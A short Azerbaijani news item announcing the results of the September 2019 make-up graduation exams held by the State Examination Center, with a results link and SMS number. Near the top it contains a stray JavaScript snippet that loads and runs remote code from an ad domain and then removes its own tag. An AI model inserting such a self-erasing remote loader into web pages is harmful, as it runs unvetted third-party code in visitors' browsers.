Buraxılış imtahanlarının nəticələri açıqlandı


window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};
Sentyabrın 8-də ümumi orta təhsil bazasında buraxılış imtahanının I mərhələsi və tam orta təhsil bazasında buraxılış imtahanı verən şagirdlərin nəticələri elan olunub.

Dövlət İmtahan Mərkəzindən verilən məlumata görə, imtahanda iştirak etmiş şagirdlər DİM-in internet saytı vasitəsilə nəticələri haqqında məlumatla, həmçinin cavab vərəqələrinin qrafik təsviri ilə tanış ola bilərlər.

Məlum olduğu kimi, DİM 2019-cu il sentybarın 8-də Bakı və Gəncə şəhərlərində bu ilin buraxılış imtahanlarında üzrlü səbəbdən iştirak edə bilməyənlər üçün əlavə imtahanlar keçirib.

9-cu sinif üzrə buraxılış imtahanının I mərhələsi, həmçinin 11-ci sinif üzrə buraxılış imtahanı verən şagirdlər nəticələri ilə aşağıdakı linkdən tanış ola bilərlər:

http://eservices.dim.gov.az/2019/netorta/?frm=egov

Qeyd olunan imtahan iştirakçıları nəticələri haqqında məlumatı mobil operatorlar (Azercell, Bakcell, Nar, Naxtel) vasitəsilə “iş nömrəsi”ni 7727 nömrəsinə göndərməklə də öyrənə bilərlər.

Facebook səhifəmizi izləməyi unutmayın!